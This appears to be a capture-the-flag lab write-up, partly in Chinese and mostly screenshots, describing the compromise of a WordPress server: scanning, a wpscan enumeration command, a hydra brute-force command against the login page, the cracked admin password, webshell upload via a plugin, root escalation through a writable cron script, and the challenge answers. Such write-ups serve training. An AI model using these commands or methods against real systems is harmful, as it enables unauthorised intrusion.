Web Range-128 - HackMD

# Web Range-128 ## Challenge 128 ## Challenge 129 ![image](https://hackmd.io/_uploads/rJkEX8tFgg.png) * Rustscan * ![image](https://hackmd.io/_uploads/HkY1IN5Ygx.png) * Nmap * ![image](https://hackmd.io/_uploads/B14SLEqFgg.png) * Wordpress website * ![image](https://hackmd.io/_uploads/rJtb849Fgl.png) * ![image](https://hackmd.io/_uploads/BkzfIVctlx.png) * dirsearch * ![image](https://hackmd.io/_uploads/Bk68LEcFeg.png) * WPScan * ![image](https://hackmd.io/_uploads/BJyyvV5Flg.png) ```zsh= wpscan --url http://10.10.1.62/ -e vp vt u ``` * Wpadmin * ![image](https://hackmd.io/_uploads/Bymfw45Kxg.png) * Using hydra got wpadmin's password * ![image](https://hackmd.io/_uploads/B1laDN9Kxe.png) * ![image](https://hackmd.io/_uploads/BkTFd49Yxe.png) * `admin:@6h$ER$*l3z` ```zsh= hydra -l admin -P Passwords.txt 10.10.1.62 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:The password you entered for the username" ``` * 後台上傳plugin, 成功上傳phpinfo到`/wp-content/uploads/2025/08/info.php` * ![image](https://hackmd.io/_uploads/S1SlsV5Feg.png) * ![image](https://hackmd.io/_uploads/ryyziNcFgl.png) * Upload webshell and got shell as `www-data` * ![image](https://hackmd.io/_uploads/rJyPjN5tee.png) * ![image](https://hackmd.io/_uploads/H1huiN5tex.png) * ![image](https://hackmd.io/_uploads/Hy8njN9txx.png) * `data.sh` has permission 777 * ![image](https://hackmd.io/_uploads/BJLH24qFgx.png) * 有root的排程 * ![image](https://hackmd.io/_uploads/BkT_1Bqtgg.png) * flag * ![image](https://hackmd.io/_uploads/Bkj6Frctex.png) ## Answer * Challenge 128:`data.sh` * Challenge 129:`GfsgEE4FV`